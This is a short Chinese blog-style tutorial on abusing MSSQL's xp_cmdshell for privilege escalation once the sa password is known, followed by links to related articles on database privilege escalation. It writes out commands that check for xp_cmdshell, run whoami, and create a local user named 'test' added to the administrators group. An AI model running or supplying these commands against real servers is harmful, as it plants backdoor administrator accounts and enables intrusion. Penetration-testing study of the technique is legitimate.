mssql数据库提权中xp_cmdshell使用
mssql数据库提权中xp_cmdshell使用
获得sa密码后蚁剑连接数据库,可用xp_cmdshell执行系统命令
xp, extend procedure, 表示本存储过程是扩展的存储过程
cmdshell, command shell, 直接敲命令行执行
判断是否存在xp_cmdshell
select count(*)
from master.dbo.sysobjects
where
xtype='x'
and name='xp_cmdshell'
返回1证明存在xp_cmdshell
xp_cmdshell的使用
exec master..xp_cmdshell 'xxxxxx' 里面输入任意cmd命令便可执行
其中, master表示此存储过程在系统数据库master里
查看权限
exec master..xp_cmdshell 'whoami'
创建test用户并加入管理员组
exec master..xp_cmdshell 'net user test password /add'
exec master..xp_cmdshell 'net localgroup administrators test /add'
接着添加内网代理后进行远程连接内网数据库服务器
mssql数据库提权中xp_cmdshell使用相关推荐
- 第60天-权限提升-MYMSORA 等 SQL 数据库提权
思维导图 权限提升 数据库提权 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码.除 Access 数据库外,其 ...
- 【内网安全】——数据库提权姿势
作者名:白昼安全 主页面链接: 主页传送门 创作初心: 一切为了她 座右铭: 不要让时代的悲哀成为你的悲哀 专研方向: web安全,后渗透技术 每日emo: 在哪能找到解救我的办法 模拟环境我们拿到了 ...
- 【数据库提权】- SQL Server提权
渗透测试往往由信息收集开始,而提权是渗透测试中较为重要的环节,若始终以"低权限"身份进行渗透,测试出的问题相对于高权限的质量会低很多,权限提升意味着用户获得不允许他使用的权限.比如 ...
- 安全测试(三) 服务器安全 渗透测试 常规服务器安全漏洞 高危端口暴露、弱口令密码、暴力破解、服务器提权、Mysql数据库提权等 浅谈《社会工程学》实战案例
文章目录 一.前言 二.服务器安全 高危端口 2.1 端口号(Port number) 2.2 常见端口后及其用途表 2.3 端口号 扫描工具介绍 2.4 端口号 端口说明 攻击技巧 2.5 安全警示 ...
- MySQL数据库提权
MySQL 数据库提权 一.UDF提权 UDF(User defined function,用户自定义函数)是MySQL的一个拓展接口,也就是支持用户自定义函数的功能.这里的自定义函数要以dll形式写 ...
- MYSQL数据库提权的几种方法——提权教程
一.简介 在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权. 数据库提权的前提条件: 1.服务器开启数据库服务 2.获取到最高权限用户密码 (除Access数据库外,其他数据库基本都存在数据库提 ...
- 【权限提升】61 Redis Postgresql数据库提权
目录 redis数据库权限提升 Redis未授权访问漏洞利用 1. 利用计划任务执行命令反弹shell 2. 写ssh-keygen公钥后 使用私钥登录 3. 往web路径写webshell 修复方案 ...
- 内网中入侵linux系统,MSSQL 入侵提权之内网渗透案例分析
图文:udb311 主题:MSSQL内网渗透案例分析 发表:黑白前线 描述:对于内网渗透技术一直感觉很神秘,手中正巧有一个webshell是内网服务器.借此机会练习下内网入侵渗透技术!本文敏感信息以屏 ...
- 权限提升之——数据库提权
数据库权限提升 这是这两天学习的哈,一篇篇发太麻烦了,就整理在一篇文章里了,整体感觉基本都是靠工具,不靠工具的还是都比较有难度的,五一假期过去了也该继续回到紧张的学习中了,冲鸭! 在家没衣服穿太可怜了 ...
最新文章
- 【通俗理解线性代数】 -- 矩阵与空间的基和坐标
- 搜索suggest实现 动态的查询建议
- pwnable.kr lotto题解
- 模型占用GPU显存计算
- 怎么给当前点击的a标签添加一个样式(跳转页面后)
- 第9条:覆盖equals时总要覆盖hashCode
- onRetainNonConfigurationInstance和getLastNonConfigurationInstance
- Java中的类型推断和lambda表达式
- Spring Boot 中使用 MyBatis 整合 Druid 多数据源
- 浅析OpenLayer3加载WMS一些问题
- 在windows server 2008 R2上运行disk cleanup
- 小程序进入页面图片渲染会拉伸闪下变形优化bug
- thikPHP框架部署
- Atitit.vs2017 visual studio vs2003 vs2005 vs2008 VS2010 vs2012 vs2015新特性 新功能.docx Atitit. visual st
- Python小程序(4)--52周存钱挑战
- 利用快递100api查询快递信息
- 一个遮罩层怎么遮罩两个图层_遮罩动画只能有两个图层,上面为“遮罩层”,下面为“被遮罩”层。...
- Unity Apple登录接入
- 瑞星微RK3288开发板 (ARM Cortex-A17架构)
- h5调取摄像头实时显示并点击按钮拍照